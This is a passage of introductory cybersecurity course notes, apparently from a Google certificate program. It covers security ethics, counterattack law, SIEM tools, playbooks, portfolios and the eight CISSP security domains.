responsibility and obligation is to adhere to the policies and protocols you've been trained to
follow. In many cases, security teams are entrusted with greater access to data and information
than other employees. Security professionals must always respect that privilege and act ethically.
Security ethics are guidelines for making appropriate decisions as a security professional. As
another example, if you as an analyst can grant yourself access to payroll data and can give yourself
a raise, just because you have access to do so, does that mean you should? The answer is no. You
should never abuse the access you've been granted and entrusted with. Let's discuss ethical
principles that may raise questions as you navigate solutions for mitigating risks. These are
confidentiality, privacy protections, and laws. Let's begin with the first ethical principle,
confidentiality. Earlier we discussed confidentiality as part of the CIA triad. Now let's discuss how
confidentiality can be applied to ethics. As a security professional, you'll encounter proprietary or
private information, such as PII. It's your ethical duty to keep that information confidential and safe.
For example, you may want to help a coworker by providing computer system access outside of
properly documented channels. However, this ethical violation can result in serious consequences,
including reprimands, the loss of your professional reputation, and legal repercussions for both you
and your friend. The second ethical principle to consider is privacy protections. Privacy protection
means safeguarding personal information from unauthorized use. For example, imagine you receive
a personal email after hours from your manager requesting a colleague's home phone number. Your
manager explains that they can't access the employee database now, but they need to discuss an
urgent matter with that person. As a security analyst, your role is to follow the policies and
procedures of your company, which in this example, state that employee information is stored in a
secure database and should never be accessed or shared in any other format. So, accessing and
sharing the employee's personal information would be unethical. In situations like this, it can be
difficult to know what to do. So, the best response is to adhere to the policies and procedures set by
your organization. A third important ethical principle we must discuss is the law. Laws are rules
that are recognized by a community and enforced by a governing entity. For example, consider a
staff member at a hospital who has been trained to handle PII, and SPII for compliance. The staff
member has files with confidential data that should never be left unsupervised, but the staff
member is late for a meeting. Instead of locking the files in a designated area, the files are left on the
staff member's desk, unsupervised. Upon the employee's return, the files are missing. The staff
member has just violated multiple compliance regulations, and their actions were unethical and
illegal, since their negligence has likely resulted in the loss of private patient and hospital data. As
you enter the security field, remember that technology is constantly evolving, and so are attackers'
tactics and techniques. Because of this, security professionals must continue to think critically
about how to respond to attacks. Having a strong sense of ethics can guide your decisions to ensure
that the proper processes and procedures are followed to mitigate these continually evolving risks.
Ethical concepts that guide cybersecurity decisions
Previously, you were introduced to the concept of security ethics. Security ethics are guidelines for
making appropriate decisions as a security professional. Being ethical requires that security
professionals remain unbiased and maintain the security and confidentiality of private data. Having a
strong sense of ethics can help you navigate your decisions as a cybersecurity professional so you’re
able to mitigate threats posed by threat actors’ constantly evolving tactics and techniques. In this
reading, you’ll learn about more ethical concepts that are essential to know so you can make appropriate
decisions about how to respond to attacks legally and ethically in a way that protects organizations and
people alike.
Ethical concerns and laws related to counterattacks
United States standpoint on counterattacks
In the U.S., deploying a counterattack on a threat actor is illegal because of laws like the Computer Fraud
and Abuse Act of 1986 and the Cybersecurity Information Sharing Act of 2015, among others. You can
only defend. The act of counterattacking in the U.S. is perceived as an act of vigilantism. A vigilante is a
person who is not a member of law enforcement who decides to stop a crime on their own. And because
threat actors are criminals, counterattacks can lead to further escalation of the attack, which can cause
even more damage and harm. Lastly, if the threat actor in question is a state-sponsored hacktivist, a
counterattack can lead to serious international implications. A hacktivist is a person who uses hacking to
achieve a political goal. The political goal may be to promote social change or civil disobedience.
For these reasons, the only individuals in the U.S. who are allowed to counterattack are approved
employees of the federal government or military personnel.
International standpoint on counterattacks
The International Court of Justice (ICJ), which updates its guidance regularly, states that a person or
group can counterattack if:
●
●
●
●
The counterattack will only affect the party that attacked first.
The counterattack is a direct communication asking the initial attacker to stop.
The counterattack does not escalate the situation.
The counterattack effects can be reversed.
Organizations typically do not counterattack because the above scenarios and parameters are hard to
measure. There is a lot of uncertainty dictating what is and is not lawful, and at times negative outcomes
are very difficult to control. Counterattack actions generally lead to a worse outcome, especially when
you are not an experienced professional in the field.
To learn more about specific scenarios and ethical concerns from an international perspective, review
updates provided in the Tallinn Manual online.
Ethical principles and methodologies
Because counterattacks are generally disapproved of or illegal, the security realm has created
frameworks and controls—such as the confidentiality, integrity, and availability (CIA) triad and others
discussed earlier in the program—to address issues of confidentiality, privacy protections, and laws. To
better understand the relationship between these issues and the ethical obligations of cybersecurity
professionals, review the following key concepts as they relate to using ethics to protect organizations
and the people they serve.
Confidentiality means that only authorized users can access specific assets or data. Confidentiality as it
relates to professional ethics means that there needs to be a high level of respect for privacy to
safeguard private assets and data.
Privacy protection means safeguarding personal information from unauthorized use. Personally
identifiable information (PII) and sensitive personally identifiable information (SPII) are types of
personal data that can cause people harm if they are stolen. PII data is any information used to infer an
individual's identity, like their name and phone number. SPII data is a specific type of PII that falls under
stricter handling guidelines, including social security numbers and credit card numbers. To effectively
safeguard PII and SPII data, security professionals hold an ethical obligation to secure private
information, identify security vulnerabilities, manage organizational risks, and align security with
business goals.
Laws are rules that are recognized by a community and enforced by a governing entity. As a security
professional, you will have an ethical obligation to protect your organization, its internal infrastructure,
and the people involved with the organization. To do this:
●
●
●
●
You must remain unbiased and conduct your work honestly, responsibly, and with the highest
respect for the law.
Be transparent and just, and rely on evidence.
Ensure that you are consistently invested in the work you are doing, so you can appropriately
and ethically address issues that arise.
Stay informed and strive to advance your skills, so you can contribute to the betterment of the
cyber landscape.
As an example, consider the Health Insurance Portability and Accountability Act (HIPAA), which is a U.S.
federal law established to protect patients' health information, also known as PHI, or protected health
information. This law prohibits patient information from being shared without their consent. So, as a
security professional, you might help ensure that the organization you work for adheres to both its legal
and ethical obligation to inform patients of a breach if their health care data is exposed.
Key takeaways
As a future security professional, ethics will play a large role in your daily work. Understanding ethics
and laws will help you make the correct choices if and when you encounter a security threat or an
incident that results in a breach.
Terms and definitions from Course 1, Module 3
Asset: An item perceived as having value to an organization
Availability: The idea that data is accessible to those who are authorized to access it
Compliance: The process of adhering to internal standards and external regulations
Confidentiality: The idea that only authorized users can access specific assets or data
Confidentiality, integrity, availability (CIA) triad: A model that helps inform how organizations
consider risk when setting up systems and security policies
Hacktivist: A person who uses hacking to achieve a political goal
Health Insurance Portability and Accountability Act (HIPAA): A U.S. federal law established to
protect patients' health information
Integrity: The idea that the data is correct, authentic, and reliable
National Institute of Standards and Technology (NIST) Cyber Security Framework (CSF): A voluntary
framework that consists of standards, guidelines, and best practices to manage cybersecurity risk
Privacy protection: The act of safeguarding personal information from unauthorized use
Protected health information (PHI): Information that relates to the past, present, or future physical
or mental health or condition of an individual
Security architecture: A type of security design composed of multiple components, such as tools and
processes, that are used to protect an organization from risks and external threats
Security controls: Safeguards designed to reduce specific security risks
Security ethics: Guidelines for making appropriate decisions as a security professional
Security frameworks: Guidelines used for building plans to help mitigate risk and threats to data
and privacy
Security governance: Practices that help support, define, and direct security efforts of an
organization
Sensitive personally identifiable information (SPII): A specific type of PII that falls under stricter
handling guidelines
Cybersecurity Tools
As mentioned earlier, security is like preparing for a storm. If you identify a leak, the color or shape
of the bucket you use to catch the water doesn't matter. What is important is mitigating the risks
and threats to your home, by using the tools available to you. As an entry-level security analyst,
you'll have a lot of tools in your toolkit that you can use to mitigate potential risks. In this video,
we'll discuss the primary purposes and functions of some commonly used security tools. And later
in the program, you'll have hands-on opportunities to practice using them. Before discussing tools
further, let's briefly discuss logs, which are the source of data that the tools we'll cover are designed
to organize. A log is a record of events that occur within an organization's systems. Examples of
security-related logs include records of employees signing into their computers or accessing webbased services. Logs help security professionals identify vulnerabilities and potential security
breaches. The first tools we'll discuss are security information and event management tools, or SIEM
tools. A SIEM tool is an application that collects and analyzes log data to monitor critical activities in
an organization. The acronym S-I-E-M may be pronounced as 'sim' or 'seem', but we'll use 'sim'
throughout this program. SIEM tools collect real-time, or instant, information, and allow security
analysts to identify potential breaches as they happen. Imagine having to read pages and pages of
logs to determine if there are any security threats. Depending on the amount of data, it could take
hours or days. SIEM tools reduce the amount of data an analyst must review by providing alerts for
specific types of risks and threats. Next, let's go over examples of commonly used SIEM tools:
Splunk and Chronicle. Splunk is a data analysis platform, and Splunk Enterprise provides SIEM
solutions. Splunk Enterprise is a self-hosted tool used to retain, analyze, and search an
organization's log data. Another SIEM tool is Google's Chronicle. Chronicle is a cloud-native SIEM
tool that stores security data for search and analysis. Cloud-native means that Chronicle allows for
fast delivery of new features. Both SIEM tools, and SIEMs in general, collect data from multiple
places, then analyze and filter that data to allow security teams to prevent and quickly react to
potential security threats. As a security analyst, you may find yourself using SIEM tools to analyze
filtered events and patterns, perform incident analysis, or proactively search for threats. Depending
on your organization's SIEM setup and risk focus, the tools and how they function may differ, but
ultimately, they are all used to mitigate risk. Other key tools that you will use in your role as a
security analyst, and that you'll have hands-on opportunities to use later in the program, are
playbooks and network protocol analyzers. A playbook is a manual that provides details about any
operational action, such as how to respond to an incident. Playbooks, which vary from one
organization to the next, guide analysts in how to handle a security incident before, during, and
after it has occurred. Playbooks can pertain to security or compliance reviews, access management,
and many other organizational tasks that require a documented process from beginning to end.
Another tool you may use as a security analyst is a network protocol analyzer, also called packet
sniffer. A packet sniffer is a tool designed to capture and analyze data traffic within a network.
Common network protocol analyzers include tcpdump and Wireshark. As an entry-level analyst,
you don't have to be an expert in these tools. As you continue through this certificate program and
get more hands-on practice, you'll continuously build your understanding of how to use these tools
to identify, assess, and mitigate risks.
Tools for protecting business operations
Previously, you were introduced to several technical skills that security analysts need to develop. You
were also introduced to some tools entry-level security analysts may have in their toolkit. In this
reading, you’ll learn more about how technical skills and tools help security analysts mitigate risks.
An entry-level analyst’s toolkit
Every organization may provide a different toolkit, depending on its security needs. As a future analyst,
it’s important that you are familiar with industry standard tools and can demonstrate your ability to
learn how to use similar tools in a potential workplace.
Security information and event management (SIEM) tools
A SIEM tool is an application that collects and analyzes log data to monitor critical activities in an
organization. A log is a record of events that occur within an organization’s systems. Depending on the
amount of data you’re working with, it could take hours or days to filter through log data on your own.
SIEM tools reduce the amount of data an analyst must review by providing alerts for specific types of
threats, risks, and vulnerabilities.
SIEM tools provide a series of dashboards that visually organize data into categories, allowing users to
select the data they wish to analyze. Different SIEM tools have different dashboard types that display the
information you have access to.
SIEM tools also come with different hosting options, including on-premise and cloud. Organizations may
choose one hosting option over another based on a security team member’s expertise. For example,
because a cloud-hosted version tends to be easier to set up, use, and maintain than an on-premise
version, a less experienced security team may choose this option for their organization.
Network protocol analyzers (packet sniffers)
A network protocol analyzer, also known as a packet sniffer, is a tool designed to capture and analyze
data traffic in a network. This means that the tool keeps a record of all the data that a computer within
an organization's network encounters. Later in the program, you’ll have an opportunity to practice using
some common network protocol analyzer (packet sniffer) tools.
Playbooks
A playbook is a manual that provides details about any operational action, such as how to respond to a
security incident. Organizations usually have multiple playbooks documenting processes and
procedures for their teams to follow. Playbooks vary from one organization to the next, but they all have
a similar purpose: To guide analysts through a series of steps to complete specific security-related
tasks.
For example, consider the following scenario: You are working as a security analyst for an incident
response firm. You are given a case involving a small medical practice that has suffered a security
breach. Your job is to help with the forensic investigation and provide evidence to a cybersecurity
insurance company. They will then use your investigative findings to determine whether the medical
practice will receive their insurance payout.
In this scenario, playbooks would outline the specific actions you need to take to conduct the
investigation. Playbooks also help ensure that you are following proper protocols and procedures. When
working on a forensic case, there are two playbooks you might follow:
●
●
The first type of playbook you might consult is called the chain of custody playbook. Chain of
custody is the process of documenting evidence possession and control during an incident
lifecycle. As a security analyst involved in a forensic analysis, you will work with the computer
data that was breached. You and the forensic team will also need to document who, what, where,
and why you have the collected evidence. The evidence is your responsibility while it is in your
possession. Evidence must be kept safe and tracked. Every time evidence is moved, it should be
reported. This allows all parties involved to know exactly where the evidence is at all times.
The second playbook your team might use is called the protecting and preserving evidence
playbook. Protecting and preserving evidence is the process of properly working with fragile
and volatile digital evidence. As a security analyst, understanding what fragile and volatile
digital evidence is, along with why there is a procedure, is critical. As you follow this playbook,
you will consult the order of volatility, which is a sequence outlining the order of data that must
be preserved from first to last. It prioritizes volatile data, which is data that may be lost if the
device in question powers off, regardless of the reason. While conducting an investigation,
improper management of digital evidence can compromise and alter that evidence. When
evidence is improperly managed during an investigation, it can no longer be used. For this
reason, the first priority in any investigation is to properly preserve the data. You can preserve
the data by making copies and conducting your investigation using those copies.
Key takeaways
In this reading, you learned about a few tools a security analyst may have in their toolkit, depending on
where they work. You also explored two important types of playbooks: chain of custody and protecting
and preserving evidence. However, these are only two procedures that occur at the beginning of a
forensic investigation. If forensic investigations interest you, you are encouraged to further explore this
career path or security practice. In the process, you may learn about forensic tools that you want to add
to your toolkit. While all of the forensic components that make up an investigation will not be covered in
this certificate program, some forensic concepts will be discussed in later courses.
Resources for more information
The Google Cybersecurity Action Team's Threat Horizon Report provides strategic intelligence for
dealing with threats to cloud enterprise.
The Cybersecurity & Infrastructure Security Agency (CISA) has a list of Free Cybersecurity Services and
Tools. Review the list to learn more about open-source cybersecurity tools.
As we discussed previously, organizations use a variety of tools, such as SIEMs, playbooks, and
packet sniffers to better manage, monitor, and analyze security threats. But those aren't the only
tools in an analyst's toolkit. Analysts also use programming languages and operating systems to
accomplish essential tasks. In this video, we'll introduce you to Python and SQL programming, and
the Linux operating system. All of which you'll have an opportunity to practice using later in the
certificate program. Organizations can use programming to create a specific set of instructions for a
computer to execute tasks. Programming allows analysts to complete repetitive tasks and processes
with a high degree of accuracy and efficiency. It also helps reduce the risk of human error and can
save hours or days compared to performing the work manually. Now that you're aware of what
programming languages are used for, let's discuss a specific and related operating system called
Linux, and two programming languages: SQL and Python.
Linux is an open-source, or publicly available, operating system. Unlike other operating systems
you may be familiar with, for example MacOS or Windows, Linux relies on a command line as the
primary user interface. Linux itself is not a programming language, but it does allow for the use of
text-based commands between the user and the operating system. You'll learn more about Linux
later in the program. A common use of Linux for entry-level security analysts is examining logs to
better understand what's occurring in a system. For example, you might find yourself using
commands to review an error log when investigating uncommonly high network traffic.
SQL stands for Structured Query Language. SQL is a programming language used to create, interact
with, and request information from a database. A database is an organized collection of information
or data. There may be millions of data points in a database. An entry-level security analyst would
use SQL to filter through the data points to retrieve specific information.
Python. Security professionals can use Python to perform tasks that are repetitive and timeconsuming and that require a high level of detail and accuracy. As a future analyst, it's important to
understand that every organization's toolkit may be somewhat different based on their security
needs.
Use tools to protect business operations
Previously, you were introduced to programming, operating systems, and tools commonly used by
cybersecurity professionals. In this reading, you’ll learn more about programming and operating
systems, as well as other tools that entry-level analysts use to help protect organizations and the people
they serve.
Tools and their purposes
Programming
Programming is a process that can be used to create a specific set of instructions for a computer to
execute tasks. Security analysts use programming languages, such as Python, to execute automation.
Automation is the use of technology to reduce human and manual effort in performing common and
repetitive tasks. Automation also helps reduce the risk of human error.
Another programming language used by analysts is called Structured Query Language (SQL). SQL is used
to create, interact with, and request information from a database. A database is an organized collection
of information or data. There can be millions of data points in a database. A data point is a specific piece
of information.
Operating systems
An operating system is the interface between computer hardware and the user. Linux®, macOS®, and
Windows are operating systems. They each offer different functionality and user experiences.
Previously, you were introduced to Linux as an open-source operating system. Open source means that
the code is available to the public and allows people to make contributions to improve the software.
Linux is not a programming language; however, it does involve the use of a command line within the
operating system. A command is an instruction telling the computer to do something. A command-line
interface is a text-based user interface that uses commands to interact with the computer. You will learn
more about Linux, including the Linux kernel and GNU, in a later course.
Web vulnerability
A web vulnerability is a unique flaw in a web application that a threat actor could exploit by using
malicious code or behavior, to allow unauthorized access, data theft, and malware deployment.
To stay up-to-date on the most critical risks to web applications, review the Open Web Application
Security Project (OWASP) Top 10.
Antivirus software
Antivirus software is a software program used to prevent, detect, and eliminate malware and viruses. It
is also called anti-malware. Depending on the type of antivirus software, it can scan the memory of a
device to find patterns that indicate the presence of malware.
Intrusion detection system
An intrusion detection system (IDS) is an application that monitors system activity and alerts on possible
intrusions. The system scans and analyzes network packets, which carry small amounts of data through
a network. The small amount of data makes the detection process easier for an IDS to identify potential
threats to sensitive data. Other occurrences an IDS might detect can include theft and unauthorized
access.
Encryption
Encryption makes data unreadable and difficult to decode for an unauthorized user; its main goal is to
ensure confidentiality of private data. Encryption is the process of converting data from a readable
format to a cryptographically encoded format. Cryptographic encoding means converting plaintext into
secure ciphertext. Plaintext is unencrypted information and secure ciphertext is the result of
encryption.
Note: Encoding and encryption serve different purposes. Encoding uses a public conversion algorithm to
enable systems that use different data representations to share information.
Penetration testing
Penetration testing, also called pen testing, is the act of participating in a simulated attack that helps
identify vulnerabilities in systems, networks, websites, applications, and processes. It is a thorough risk
assessment that can evaluate and identify external and internal threats as well as weaknesses.
Key takeaways
In this reading, you learned more about programming and operating systems. You were also introduced
to several new tools and processes. Every organization selects their own set of tools. Therefore, the
more tools you know, the more valuable you are to an organization. Tools help security analysts
complete their tasks more efficiently and effectively.
Create a cybersecurity portfolio
Throughout this certificate program, you will have multiple opportunities to develop a professional
cybersecurity portfolio to showcase your security skills and knowledge.
In this reading, you’ll learn what a portfolio is and why it’s important to develop a professional
cybersecurity portfolio. You’ll also learn about options for creating an online or self-hosted portfolio that
you can share with potential employers when you begin to look for cybersecurity jobs.
What is a portfolio, and why is it necessary?
Cybersecurity professionals use portfolios to demonstrate their security education, skills, and
knowledge. Professionals typically use portfolios when they apply for jobs to show potential employers
that they are passionate about their work and can do the job they are applying for. Portfolios are more in
depth than a resume, which is typically a one-to-two page summary of relevant education, work
experience, and accomplishments. You will have the opportunity to develop a resume, and finalize your
portfolio, in the last course of this program.
Options for creating your portfolio
There are many ways to present a portfolio, including self-hosted and online options such as:
●
●
●
●
Documents folder
Google Drive or Dropbox™
Google Sites
Git repository
Option 2: Google Drive or Dropbox
Description: Google Drive and Dropbox offer similar features that allow you to store your professional
documentation on a cloud platform. Both options also have file-sharing features, so you can easily share
your portfolio documents with potential employers. Any additions or changes you make to a document
within that folder will be updated automatically for anyone with access to your portfolio.
Similar to a documents folder, keeping your Google Drive or Dropbox-based portfolio well organized will
be helpful as you begin or progress through your career.
Setup: To learn how to upload and share files on these applications, visit the Google Drive and Dropbox
websites for more information.
Option 3: Google Sites
Description: Google Sites and similar website hosting options have a variety of easy-to-use features to
help you present your portfolio items, including customizable layouts, responsive webpages, embedded
content capabilities, and web publishing.
Responsive webpages automatically adjust their content to fit a variety of devices and screen sizes. This
is helpful because potential employers can review your content using any device and your media will
display just as you intend. When you’re ready, you can publish your website and receive a unique URL.
You can add this link to your resume so hiring managers can easily access your work.
Setup: To learn how to create a website in Google Sites, visit the Google Sites website.
Option 4: Git repository
Description: A Git repository is a folder within a project. In this instance, the project is your portfolio,
and you can use your repository to store the documents, labs, and screenshots you complete during each
course of the certificate program. There are several Git repository sites you can use, including:
●
●
●
GitLab
Bitbucket™
GitHub
Each Git repository allows you to showcase your skills and knowledge in a customizable space. To create
an online project portfolio on any of the repositories listed, you need to use a version of Markdown.
Setup: To learn about how to create a GitHub account and use Markdown, follow the steps outlined in
the document Get started with GitHub.
Portfolio projects
As previously mentioned, you will have multiple opportunities throughout the certificate program to
develop items to include in your portfolio. These opportunities include:
●
●
●
●
●
●
●
●
●
Drafting a professional statement
Conducting a security audit
Analyzing network structure and security
Using Linux commands to manage file permissions
Applying filters to SQL queries
Identifying vulnerabilities for a small business
Documenting incidents with an incident handler’s journal
Importing and parsing a text file in a security-related scenario
Creating or revising a resume
Note: Do not include any private, copyrighted, or proprietary documents in your portfolio. Also, if you
use one of the sites described in this reading, keep your site set to “private” until it is finalized.
Key takeaways
Now that you’re aware of some options for creating and hosting a professional portfolio, you can
consider these as you develop items for your portfolio throughout the certificate program. The more
proactive you are about creating a polished portfolio, the higher your chances of impressing a potential
employer and obtaining a new job opportunity in the cybersecurity profession.
Portfolio Activity Exemplar: Draft a professional statement
Here is a completed exemplar along with an explanation of how the exemplar fulfills the expectations for
the activity.
Link to exemplar:
●
Professional statement exemplar
Glossary terms from module 4
Terms and definitions from Course 1, Module 4
Antivirus software: A software program used to prevent, detect, and eliminate malware and viruses
Database: An organized collection of information or data
Data point: A specific piece of information
Intrusion detection system (IDS): An application that monitors system activity and alerts on possible
intrusions
Linux: An open-source operating system
Log: A record of events that occur within an organization’s systems
Network protocol analyzer (packet sniffer): A tool designed to capture and analyze data traffic within a
network
Order of volatility: A sequence outlining the order of data that must be preserved from first to last
Programming: A process that can be used to create a specific set of instructions for a computer to
execute tasks
Protecting and preserving evidence: The process of properly working with fragile and volatile digital
evidence
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities in an organization
SQL (Structured Query Language): A programming language used to create, interact with, and request
information from a database
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
(This is the course you just completed. Well done!)
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 2 – Managing Security Risks
Earlier, we defined security and explored some common job responsibilities for entry-level analysts. We
also discussed core skills and knowledge that analysts need to develop. Then, we shared some key
events like the LoveLetter and Morris attacks that led to the development and ongoing evolution of the
security field. We also introduced you to frameworks, controls, and the CIA triad, which are all used to
reduce risk. In this course, we'll discuss the focus of Certified Information Systems Security
Professional's, or CISSP's, eight security domains. We'll also cover security frameworks and controls in
more detail, with a focus on NIST's Risk Management Framework. Additionally, we'll explore security
audits, including common elements of internal audits. Then, we'll introduce some basic security tools,
and you'll have a chance to explore how to use security tools to protect assets and data from threats,
risks, and vulnerabilities. Securing an organization and its assets from threats, risks, and vulnerabilities
is an important step in maintaining business operations. In my experience as a security analyst, I helped
respond to a severe breach that cost the organization nearly $250,000.
Course 2 overview
Hello, and welcome to Play It Safe: Manage Security Risks, the second course in the Google
Cybersecurity Certificate. You’re on an exciting journey!
By the end of this course, you will develop a greater understanding of the eight Certified
Information Systems Security Professional (CISSP) security domains, as well as specific
security frameworks and controls. You’ll also be introduced to how to use security tools
and audits to help protect assets and data. These are key concepts in the cybersecurity
field, and understanding them will help you keep organizations, and the people they serve,
safe from threats, risks, and vulnerabilities.
The Google Cybersecurity Certificate program has eight courses. Play It Safe: Manage
Security Risks is the second course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including
significant events that led to the development of the cybersecurity field and its
continued importance to organizational operations. Learn about entry-level
cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — (current course) Identify how cybersecurity
professionals use frameworks and controls to protect business operations, and
explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of
network-level vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills,
including communicating with the Linux operating system through the command
line and querying databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security
controls and developing a threat actor mindset to protect and defend an
organization’s assets from various threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response
lifecycle and practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming
language and write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification,
escalation, and ways to communicate with stakeholders. This course closes out the
program with tips on how to engage with the cybersecurity community and prepare
for your job search.
Course 2 content
Each course of this certificate program is broken into modules. You can complete courses at your
own pace, but the module breakdowns are designed to help you finish the entire Google
Cybersecurity Certificate in about six months.
What’s to come? Here’s a quick overview of the skills you’ll learn in each module of this course.
Module 1: Security domains
You will gain understanding of the CISSP’s eight security domains. Then, you'll learn about primary
threats, risks, and vulnerabilities to business operations. In addition, you'll explore the National
Institute of Standards and Technology’s (NIST) Risk Management Framework and the steps of risk
management.
Module 2: Security frameworks and controls
You will focus on security frameworks and controls, along with the core components of the
confidentiality, integrity, and availability (CIA) triad. You'll learn about Open Web Application
Security Project (OWASP) security principles and security audits.
Module 3: Introduction to cybersecurity tools
You will explore industry leading security information and event management (SIEM) tools that are
used by security professionals to protect business operations. You'll learn how entry-level security
analysts use SIEM dashboards as part of their every day work.
Module 4: Use playbooks to respond to incidents
You'll learn about the purposes and common uses of playbooks. You'll also explore how
cybersecurity professionals use playbooks to respond to identified threats, risks, and
vulnerabilities.
The world of security, which we also refer to as cybersecurity throughout this program, is vast. So
making sure that you have the knowledge, skills, and tools to successfully navigate this world is why
we're here. In the following videos, you'll learn about the focus of CISSP's eight security domains. Then,
we'll discuss threats, risks, and vulnerabilities in more detail. We'll also introduce you to
the three layers of the web and share some examples to help you understand the different types of
attacks that we'll discuss throughout the program. Finally, we'll examine how to manage risks by using
the National Institute of Standards and Technology's Risk Management Framework, known as the NIST
RMF. Because these topics and related technical skills are considered core knowledge in the security
field, continuing to build your understanding of them will help you mitigate and manage the risks and
threats that organizations face on a daily basis. In the next video, we'll further discuss the focus of the
eight security domains introduced in the first course.
Welcome back! You might remember from course one that there are eight security domains, or
categories, identified by CISSP. Security teams use them to organize daily tasks and identify gaps in
security that could cause negative consequences for an organization, and to establish their security
posture. Security posture refers to an organization's ability to manage its defense of critical assets and
data and react to change. In this video, we'll discuss the focus of the first four domains: security and risk
management, asset security, security architecture and engineering, and communication and network
security.
The first domain is security and risk management. There are several areas of focus for this domain:
defining security goals and objectives, risk mitigation, compliance, business continuity, and legal
regulations. Let's discuss each area of focus in more detail. By defining security goals and objectives,
organizations can reduce risks to critical assets and data like PII, or personally identifiable information.
Risk mitigation means having the right procedures and rules in place to quickly reduce the impact of a
risk like a breach. Compliance is the primary method used to develop an organization's internal security
policies, regulatory requirements, and independent standards. Business continuity relates to an
organization's ability to maintain their everyday productivity by establishing risk disaster recovery
plans. And finally, while laws related to security and risk management are different worldwide, the
overall goals are similar. As a security professional, this means following rules and expectations for
ethical behavior to minimize negligence, abuse, or fraud.
The next domain is asset security. The asset security domain is focused on
securing digital and physical assets. It's also related to the storage, maintenance, retention, and
destruction of data. This means that assets such as PII or SPII should be securely handled and protected,
whether stored on a computer, transferred over a network like the internet, or
even physically collected. Organizations also need to have policies and procedures that ensure data is
properly stored, maintained, retained, and destroyed. Knowing what data you have and who has
access to it is necessary for having a strong security posture that mitigates risk to critical assets and
data. Previously, we provided a few examples that touched on the disposal of data. For example, an
organization might have you, as a security analyst, oversee the destruction of hard drives to make
sure that they're properly disposed of. This ensures that private data stored on those drives can't be
accessed by threat actors.
The third domain is security architecture and engineering. This domain is focused on optimizing data
security by ensuring effective tools, systems, and processes are in place to protect an organization's
assets and data. One of the core concepts of secure design architecture is shared responsibility. Shared
responsibility means that all individuals within an organization take an active role in lowering risk and
maintaining both physical and virtual security. By having policies that
encourage users to recognize and report security concerns, many issues can be handled quickly and
effectively.
The fourth domain is communication and network security, which is mainly focused on managing and
securing physical networks and wireless communications. Secure networks keep an organization's data
and communications safe whether on-site, or in the cloud, or when connecting to services remotely. For
example, employees working remotely in public spaces need to be protected from vulnerabilities that
can occur when they use insecure bluetooth connections or public wifi hotspots. By having security team
members remove access to those types of communication channels at the organizational level,
employees may be discouraged from practicing insecure behavior that could be exploited by threat
actors. Now that we've reviewed the focus of our first four domains, let's discuss the last four domains.
In this video, we'll cover the last four domains: identity and access management, security assessment and
testing, security operations, and software development security.
The fifth domain is identity and access management, or IAM. And it's focused on access and
authorization to keep data secure by making sure users follow established policies to control and
manage assets. As an entry-level analyst, it's essential to keep an organization's systems and data as
secure as possible by ensuring user access is limited to what employees need. Basically, the goal of IAM
is to reduce the overall risk to systems and data. For example, if everyone at a company
is using the same administrator login, there is no way to track who has access to what data. In the event
of a breach, separating valid user activity from the threat actor would be impossible. There are four
main components to IAM. Identification is when a user verifies who they are by providing a user name,
an access card, or biometric data such as a fingerprint. Authentication is the verification
process to prove a person's identity, such as entering a password or PIN. Authorization takes place after
a user's identity has been confirmed and relates to their level of access, which depends on the role in the
organization. Accountability refers to monitoring and recording user actions, like login attempts, to
prove systems and data are used properly.
The sixth security domain is security assessment and testing. This domain focuses on conducting security
control testing, collecting and analyzing data, and conducting security audits to monitor for risks,
threats, and vulnerabilities. Security control testing can help an organization identify new and better
ways to mitigate threats, risks, and vulnerabilities. This involves examining organizational goals and
objectives, and evaluating if the controls being used actually achieve those goals. Collecting and
analyzing security data regularly also helps prevent threats and risks to the organization. Analysts might
use security control testing evaluations and security assessment reports to improve existing controls or
implement new controls. An example of implementing a new control could be requiring the use of multifactor authentication to better protect the
organization from potential threats and risks. Next, let's discuss security operations.
The security operations domain is focused on conducting investigations and implementing preventative
measures. Investigations begin once a security incident has been identified. This process requires a
heightened sense of urgency in order to minimize potential risks to the organization. If there is an active
attack, mitigating the attack and preventing it from escalating further is essential for ensuring that
private information is protected from threat actors. Once the threat has been neutralized, the collection
of digital and physical evidence to conduct a forensic investigation will begin. A digital forensic
investigation must take place to identify when, how, and why the breach occurred. This helps security
teams determine areas for improvement and preventative measures that can be taken to mitigate future
attacks.
The eighth and final security domain is software development security. This domain focuses on using
secure coding practices. As you may remember, secure coding practices are recommended guidelines
that are used to create secure applications and services. The software development lifecycle is an
efficient process used by teams to quickly build software products and features. In this process, security
is an additional step. By ensuring that each phase of the software development lifecycle undergoes
security reviews, security can be fully integrated into the software product. For example, performing a
secure design review during the design phase, secure code reviews during
the development and testing phases, and penetration testing during the deployment and
implementation phase ensures that security is embedded into the software product at every step. This
keeps software secure and sensitive data protected, and mitigates unnecessary
risk to an organization. Being familiar with these domains can help you better understand how they're
used to improve the overall security of an organization and the critical role security teams play.
Security domains cybersecurity analysts need to know
